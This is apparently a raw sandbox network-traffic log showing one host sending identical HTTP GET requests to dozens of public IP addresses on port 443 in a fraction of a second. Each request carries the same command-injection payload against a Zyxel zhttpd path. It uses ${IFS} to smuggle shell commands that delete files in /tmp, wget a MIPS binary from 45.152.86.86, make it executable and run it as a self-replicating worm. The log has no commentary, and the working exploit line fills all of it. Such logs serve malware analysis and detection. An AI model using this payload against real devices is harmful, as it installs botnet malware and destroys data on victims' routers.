                                        Mar 31, 2024 09:22:24.650701046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7894192.168.2.23341084.175.98.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.650755882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7895192.168.2.235600682.103.72.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.650825024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7896192.168.2.2345686150.2.247.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.650903940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7897192.168.2.2340354174.63.65.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.650938034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7898192.168.2.235662037.155.53.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.651005030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7899192.168.2.2354456158.52.65.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.651068926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7900192.168.2.233545684.53.99.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.651120901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7901192.168.2.2357162108.151.189.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.651171923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7902192.168.2.2339486126.235.54.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.651238918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7903192.168.2.2337198166.167.31.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.651287079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7904192.168.2.23562101.48.168.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.651362896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7905192.168.2.2335310150.43.173.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.651432991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7906192.168.2.233412034.182.145.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.651520967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7907192.168.2.235458619.25.210.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.651576996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7908192.168.2.2346958106.112.113.199443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.651634932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7909192.168.2.2333786191.42.212.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.651686907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7910192.168.2.233950449.10.155.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.651740074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7911192.168.2.2358754150.75.15.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.651777029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7912192.168.2.2332814164.98.18.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.651840925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7913192.168.2.2349248104.96.161.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.651906013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7914192.168.2.2336412165.80.195.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.651959896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7915192.168.2.235362245.157.65.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.652014017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7916192.168.2.2354526197.192.146.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.652077913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7917192.168.2.2357754212.197.58.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.652146101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7918192.168.2.234353273.173.23.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.652235985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7919192.168.2.2333000181.121.109.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.652283907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7920192.168.2.2337548218.44.143.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.652348042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7921192.168.2.235987812.224.78.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.652416945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7922192.168.2.2342074186.222.38.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.652488947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7923192.168.2.2349364173.157.9.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.652539015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7924192.168.2.234369247.196.87.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.652606964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7925192.168.2.2353400122.226.182.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.652657032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7926192.168.2.2337582181.127.118.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.652720928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7927192.168.2.23470942.91.202.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.652785063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7928192.168.2.2354974191.198.197.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.652844906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7929192.168.2.2351878153.247.244.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.652924061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7930192.168.2.2344296157.15.115.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.653001070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7931192.168.2.2341688166.53.61.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.653057098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7932192.168.2.2344064211.94.161.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.653132915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7933192.168.2.2349360197.59.214.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.653166056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7934192.168.2.2354626122.169.41.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.653239965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7935192.168.2.2338900192.86.8.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.653295040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7936192.168.2.235530244.41.92.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.653362989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7937192.168.2.234646250.28.247.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.653423071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7938192.168.2.2344624175.167.42.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.653496981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7939192.168.2.23412209.237.163.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.653563976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7940192.168.2.235661073.82.157.154443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.653630972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7941192.168.2.2359776169.232.38.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.653690100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7942192.168.2.2351026177.104.84.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.653754950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7943192.168.2.2342706197.25.146.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.653819084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7944192.168.2.235513868.109.192.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.653887987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7945192.168.2.2333538192.190.143.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.653948069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7946192.168.2.2337532103.53.203.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.654012918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7947192.168.2.235472651.208.115.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.654069901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7948192.168.2.2332960207.106.211.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.654140949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7949192.168.2.233845077.228.174.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.654218912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7950192.168.2.2341992193.31.24.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.654272079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7951192.168.2.2346888148.164.69.154443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.654341936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7952192.168.2.2341274120.193.31.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.654397011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7953192.168.2.234813260.125.85.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.654447079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7954192.168.2.233849443.154.146.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.654504061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7955192.168.2.2354736213.55.58.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.654557943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7956192.168.2.235620046.205.23.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.654614925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7957192.168.2.2357004161.247.17.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.654676914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7958192.168.2.2334664107.15.1.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.654746056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7959192.168.2.2352184207.78.148.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.654829979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7960192.168.2.2335228222.130.82.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.654881954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7961192.168.2.235908059.40.105.88443
                                        TimestampBytes transferredDirectionData
